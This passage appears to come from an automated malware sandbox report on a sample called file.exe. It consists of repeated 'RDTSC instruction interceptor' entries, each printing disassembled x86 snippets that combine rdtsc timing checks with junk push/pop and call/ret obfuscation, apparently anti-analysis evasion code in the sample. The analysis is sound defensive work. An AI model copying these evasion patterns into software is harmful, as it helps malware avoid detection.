0000001Ch 0x00000055 inc ebx 0x00000056 push ebx 0x00000057 ret 0x00000058 pop ebx 0x00000059 ret 0x0000005a cld 0x0000005b push eax 0x0000005c pushad 0x0000005d push eax 0x0000005e jmp 00007FB7D509B851h 0x00000063 pop eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push edi 0x00000067 pop edi 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 931D6F second address: 931D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 931D73 second address: 931D87 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB7D509B846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007FB7D509B846h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 931F1E second address: 931FC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FB7D50A5ED8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov bx, si 0x00000029 push dword ptr fs:[00000000h] 0x00000030 mov ebx, dword ptr [ebp+122D2AEEh] 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d jne 00007FB7D50A5EDCh 0x00000043 mov eax, dword ptr [ebp+122D0A55h] 0x00000049 push 00000000h 0x0000004b push eax 0x0000004c call 00007FB7D50A5ED8h 0x00000051 pop eax 0x00000052 mov dword ptr [esp+04h], eax 0x00000056 add dword ptr [esp+04h], 0000001Dh 0x0000005e inc eax 0x0000005f push eax 0x00000060 ret 0x00000061 pop eax 0x00000062 ret 0x00000063 mov edi, dword ptr [ebp+122D2B6Eh] 0x00000069 push FFFFFFFFh 0x0000006b mov edi, dword ptr [ebp+122D2AFEh] 0x00000071 nop 0x00000072 jmp 00007FB7D50A5EDBh 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a pushad 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 931FC9 second address: 931FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 936521 second address: 93652F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FB7D50A5EDCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93652F second address: 93657D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 and edi, 0F847E87h 0x0000000e push 00000000h 0x00000010 xor ebx, dword ptr [ebp+122D2B72h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007FB7D509B848h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 xchg eax, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FB7D509B850h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93657D second address: 936596 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93A766 second address: 93A770 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93ACD4 second address: 93AD5D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB7D50A5ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007FB7D50A5EE0h 0x00000012 clc 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FB7D50A5ED8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f sub bl, FFFFFFE2h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007FB7D50A5ED8h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e mov dword ptr [ebp+122D2E25h], ebx 0x00000054 xchg eax, esi 0x00000055 push eax 0x00000056 push edx 0x00000057 push ebx 0x00000058 jmp 00007FB7D50A5EE9h 0x0000005d pop ebx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93BF16 second address: 93BF24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93BF24 second address: 93BF29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 937891 second address: 9378B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FB7D509B852h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93673B second address: 936756 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB7D50A5EDCh 0x00000008 jnp 00007FB7D50A5ED6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007FB7D50A5ED8h 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93CEE6 second address: 93CEEC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93CEEC second address: 93CF8D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB7D50A5EDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c jmp 00007FB7D50A5EE6h 0x00000011 pop eax 0x00000012 nop 0x00000013 push edx 0x00000014 movsx edi, cx 0x00000017 pop edi 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007FB7D50A5ED8h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000019h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 mov bx, 3475h 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 jl 00007FB7D50A5EF0h 0x0000004a call 00007FB7D50A5EE3h 0x0000004f mov dword ptr [ebp+122D2518h], esi 0x00000055 pop edi 0x00000056 mov bx, si 0x00000059 mov eax, dword ptr [ebp+122D02CDh] 0x0000005f mov ebx, dword ptr [ebp+122D32A1h] 0x00000065 clc 0x00000066 push FFFFFFFFh 0x00000068 sub dword ptr [ebp+1245946Eh], edx 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 push edx 0x00000072 push ebx 0x00000073 pop ebx 0x00000074 pop edx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93CF8D second address: 93CF92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93EF19 second address: 93EF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D8FED second address: 8D8FF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D8FF3 second address: 8D9005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D9005 second address: 8D9009 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9483F6 second address: 9483FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 947C6D second address: 947C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FB7D509B846h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 947C7A second address: 947C80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 947C80 second address: 947C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB7D509B855h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 947C9D second address: 947CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94B3AA second address: 94B3B8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB7D509B846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 952391 second address: 952395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9510E6 second address: 9510EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9510EE second address: 951112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FB7D50A5EEFh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951112 second address: 95114B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB7D509B85Ah 0x00000008 jmp 00007FB7D509B854h 0x0000000d push edx 0x0000000e jmp 00007FB7D509B854h 0x00000013 pop edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95114B second address: 951150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951150 second address: 951156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95180A second address: 951819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FB7D50A5ED6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951ADF second address: 951AE5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951AE5 second address: 951AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951AF2 second address: 951AFE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jp 00007FB7D509B846h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951AFE second address: 951B28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE5h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB7D50A5EE1h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951C60 second address: 951C64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951C64 second address: 951CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB7D50A5ED6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 pop esi 0x00000013 pushad 0x00000014 jg 00007FB7D50A5ED8h 0x0000001a pushad 0x0000001b popad 0x0000001c jl 00007FB7D50A5EE9h 0x00000022 jmp 00007FB7D50A5EE1h 0x00000027 push edi 0x00000028 pop edi 0x00000029 push eax 0x0000002a pushad 0x0000002b popad 0x0000002c js 00007FB7D50A5ED6h 0x00000032 pop eax 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951CA7 second address: 951CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB7D509B846h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 951E4A second address: 951E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95508F second address: 95509C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007FB7D509B846h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95509C second address: 9550C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB7D50A5ED6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FB7D50A5EE3h 0x00000011 pushad 0x00000012 popad 0x00000013 jne 00007FB7D50A5ED6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9598C4 second address: 959914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB7D509B857h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FB7D509B856h 0x00000011 pushad 0x00000012 jmp 00007FB7D509B859h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959A6C second address: 959A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959EB0 second address: 959EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959EB6 second address: 959EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959EBF second address: 959EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959EC4 second address: 959ED3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDAh 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959ED3 second address: 959ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95A01A second address: 95A036 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB7D50A5ED6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007FB7D50A5EDDh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95A1A6 second address: 95A1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D509B855h 0x00000009 popad 0x0000000a ja 00007FB7D509B862h 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007FB7D509B846h 0x00000018 jmp 00007FB7D509B84Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95A33B second address: 95A341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95AA98 second address: 95AA9E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95AA9E second address: 95AAA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB7D50A5ED6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95AAA8 second address: 95AAAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959310 second address: 959329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 jne 00007FB7D50A5ED6h 0x0000000e pop ebx 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FB7D50A5ED6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959329 second address: 95932D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95932D second address: 959333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959333 second address: 959352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FB7D509B851h 0x0000000c jl 00007FB7D509B84Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95F712 second address: 95F71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jg 00007FB7D50A5ED8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DDF37 second address: 8DDF3C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DDF3C second address: 8DDF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FB7D50A5EE9h 0x0000000f js 00007FB7D50A5ED6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DDF67 second address: 8DDF6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DDF6D second address: 8DDF72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 920BCF second address: 909090 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB7D509B848h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D32E0h], esi 0x00000015 lea eax, dword ptr [ebp+1248593Ah] 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007FB7D509B848h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 xor dword ptr [ebp+122D36CFh], edx 0x0000003b or edi, 4D11FB41h 0x00000041 nop 0x00000042 pushad 0x00000043 jmp 00007FB7D509B855h 0x00000048 ja 00007FB7D509B848h 0x0000004e popad 0x0000004f push eax 0x00000050 jmp 00007FB7D509B853h 0x00000055 nop 0x00000056 or cl, 0000004Fh 0x00000059 call dword ptr [ebp+122D3497h] 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007FB7D509B84Ch 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 920E03 second address: 920E08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9210EB second address: 9210EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9210EF second address: 9210F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9211C3 second address: 9211D5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB7D509B846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9211D5 second address: 9211DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9211DA second address: 92127D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jnl 00007FB7D509B859h 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007FB7D509B84Ah 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jmp 00007FB7D509B84Ah 0x00000021 pop eax 0x00000022 push 00000000h 0x00000024 push ecx 0x00000025 call 00007FB7D509B848h 0x0000002a pop ecx 0x0000002b mov dword ptr [esp+04h], ecx 0x0000002f add dword ptr [esp+04h], 00000015h 0x00000037 inc ecx 0x00000038 push ecx 0x00000039 ret 0x0000003a pop ecx 0x0000003b ret 0x0000003c mov edi, dword ptr [ebp+122D2518h] 0x00000042 call 00007FB7D509B849h 0x00000047 jc 00007FB7D509B852h 0x0000004d push esi 0x0000004e jmp 00007FB7D509B84Ah 0x00000053 pop esi 0x00000054 push eax 0x00000055 jmp 00007FB7D509B858h 0x0000005a mov eax, dword ptr [esp+04h] 0x0000005e je 00007FB7D509B84Eh 0x00000064 push ecx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92127D second address: 9212B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [eax] 0x00000007 jns 00007FB7D50A5EE4h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB7D50A5EE8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 921406 second address: 921410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB7D509B846h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 921410 second address: 921465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jnl 00007FB7D50A5EDAh 0x00000012 xchg eax, esi 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FB7D50A5ED8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D3428h], ecx 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 jl 00007FB7D50A5ED8h 0x0000003c push edi 0x0000003d pop edi 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 921E19 second address: 921E4F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007FB7D509B846h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ebx 0x00000011 jns 00007FB7D509B848h 0x00000017 pop ebx 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB7D509B858h 0x00000021 rdtsc
